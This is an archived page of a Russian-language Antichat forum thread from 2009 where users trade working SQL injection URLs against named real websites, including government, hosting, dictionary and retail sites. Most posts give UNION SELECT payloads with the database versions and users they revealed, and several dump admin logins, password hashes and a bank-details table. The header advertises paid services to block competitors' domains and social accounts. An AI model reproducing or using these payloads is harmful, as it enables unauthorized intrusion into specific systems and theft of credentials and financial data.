УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1107 из 1242

1107

Опции темы

Поиск в этой теме

Опции просмотра

#11061

31.10.2009, 00:03

min7

Участник форума

Регистрация: 03.09.2005

Сообщений: 123

Провел на форуме:
1896022

Репутация: 259

Пр:4

Код:

http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,2,3,4,5,6,7,8,9,10,11--

Database Version: 4.0.20
Database name: api
User name: apiconnect2@localhost

Код:

http://apiexchange.com/index_main.php?id=8&idz=-16+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+0,1--

#11062

31.10.2009, 00:18

TELO

Познающий

Регистрация: 21.01.2009

Сообщений: 98

Провел на форуме:
227123

Репутация: 122

Отправить сообщение для TELO с помощью ICQ

Студия Граф, создание и продвижение сайтов

Код:

http://www.7ae.ru/portfolio.php?id=-72%27%20union%20select%201,2,3,4,group_concat%280x3a,user%28%29,database%28%29,version%28%29%29/*

Version:5.0.26-log
Database:grafrru_7ae
user:grafrru_7ae@localhost

#11063

31.10.2009, 06:54

keng

Познающий

Регистрация: 09.04.2008

Сообщений: 79

Провел на форуме:
463189

Репутация: 124

Охрана труда и промышленная медицина:

Код:

http://okhranatruda.ru/view_page.php?page=-1+union+select+1,2,3,4,5,6,7,8,9--

Version: 4.1.25-log
Database: aeropho6_okhrana
User: aeropho6_odmin@localhost
Выводимые поля: 2, 5.
Доступ к mysql.user: Нет.

#11064

31.10.2009, 08:41

-JC-

Познающий

Регистрация: 10.03.2009

Сообщений: 54

Провел на форуме:
110312

Репутация: 50

Отправить сообщение для -JC- с помощью ICQ

Код:

http://www.templariusze.org/artykuly.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+

#11065

31.10.2009, 09:57

H1Z

Участник форума

Регистрация: 23.03.2007

Сообщений: 170

Провел на форуме:
1355906

Репутация: 211

Отправить сообщение для H1Z с помощью ICQ

Отправить сообщение для H1Z с помощью AIM

HostiaWeb.Com - High End Shared, Reseller and Dedicated Web Hosting

Цитата:

http://www.hostiaweb.com/news.php?id=-1+union+select+1,database(),user(),version(),5

Version: 5.1.37
Database: hostw_news
User: hostw_news@localhost

P.S. не работает when в запросах =/

Последний раз редактировалось H1Z; 31.10.2009 в 10:00..

#11066

31.10.2009, 10:27

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

Отправить сообщение для Bb0y с помощью ICQ

Отправить сообщение для Bb0y с помощью Yahoo

http://www.nlrc.gov.ng/publications.php?id=4+union+select+1,concat_ws(0x3 a,id,username,password),3,4,5,6,7+from+adminlogin--
id:username

assword

==========================
http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,column_name)+fr om+information_schema.columns+where+table_name=0x6 1646D696E6973747261746F7273

http://www.hudcc.gov.ph/index.php?p=88&type=2&sec=29&aid=-4+union+select+1,group_concat(0x0b,email,0x3a,name ,0x3a,pass)+from+administrators

Последний раз редактировалось jokester; 31.10.2009 в 12:10.. Причина: Пароли

#11067

31.10.2009, 14:16

keng

Познающий

Регистрация: 09.04.2008

Сообщений: 79

Провел на форуме:
463189

Репутация: 124

Словарь Даля онлайн:

Код:

http://slovardalja.net/word.php?wordid=-1+union+select+1,2,3--

Version: 5.0.81-community-log
Database: slovarda_daldictionary
User: slovarda_daluser@localhost
Выводимые поля: 2,3.
Доступ к mysql.user: Нет.

ABBYY Lingvo:

Код:

http://www.lingvo.ru/lingvox3/?id=1+or+1=@@version--

Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: )
Database: Publishing
User: publishing

jokester: Объединяй посты КНОПКА EDIT ===>>

Последний раз редактировалось jokester; 31.10.2009 в 14:42..

#11068

31.10.2009, 19:07

~~^YaHoo^~~

Banned

Регистрация: 02.01.2009

Сообщений: 29

Провел на форуме:
178075

Репутация: 85

Отправить сообщение для ^YaHoo^ с помощью ICQ

Код:

http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11--

5.0.45-log:bdva_sql@78.140.133.152:bdva

Код:

http://ksr.infoshare.ru/lib/?div=-5+union+select+concat_ws(0x3a,user(),version(),database())--

ksrinfoshare@localhost:5.0.51a-log:h_ksr

Код:

http://www.greeceforyou.ru/hotels.php?id=76/**/union/**/select/**/1,concat_ws(0x3a,user(),version(),database()),3/*

greeceforyou-ru@fhe.hoster.ru:4.0.27-log:greeceforyou-ru

Код:

http://www.avtodirect.ru/doc.php?supplyID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database())/*

4.0.16-log:avtodirect@localhost:avtodirect_ru

#11069

31.10.2009, 22:08

pelligrim

Познающий

Регистрация: 26.04.2008

Сообщений: 31

Провел на форуме:
31474

Репутация: 53

Код HTML:

http://www.tax.vsem.com.ua/index.php?page=news.html&idnn=2432+union+select+1,2,3,4,concat_ws%280x3a,unhex%28hex%28version%28%29%29%29,unhex%28hex%28user%28%29%29%29,unhex%28hex%28database%28%29%29%29%29+from+information_schema.tables--

5.0.18-nt-log:1gbua_seren@213.186.117.201:1gbua_seren

Код HTML:

http://www.jamescourtney.com.au/media/news?id=4+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5--

5.0.81-community:jamescou_jamesco@localhost:jamescou_shoc kcustom

Код HTML:

http://www.gpstuner.com/en/news?id=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

5.1.35-log:gpstuner@localhost:gpstuner

Код HTML:

http://linvo.org/?page=news&id=99999+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5--

5.0.32-Debian_7etch11-log:linvo@localhost:linvo

#11070

31.10.2009, 23:09

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,oa_login,0x3a ,oa_pswd_md5,0x3a,email,0x3a,def_discount),4+from+ oa_users
MySQL 5.0.81-log
также есть интересные таблицы
bank_rekvizit
carts
думаю ясно что в них можно найти)
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,id_br,0x3a,bk _name,0x3a,rekvizit,0x3a,schet,0x3a,name,0x3a,nal) ,4+from+bank_rekvizit
============================
http://www.wismamerdeka.com/shop_info.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(0x0b,username,0x3a,password),14,15,16,17,18,1 9,20,21,22+from+_user

MySQL5.0.51b-community-nt
http://www.wismamerdeka.com/admin.php
з.Ы. Чет сегодня на скули фартит, со всем бы так)

Последний раз редактировалось jokester; 31.10.2009 в 23:42.. Причина: sana-med.com.ua боян, хеши

Страница 1107 из 1242

1107

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход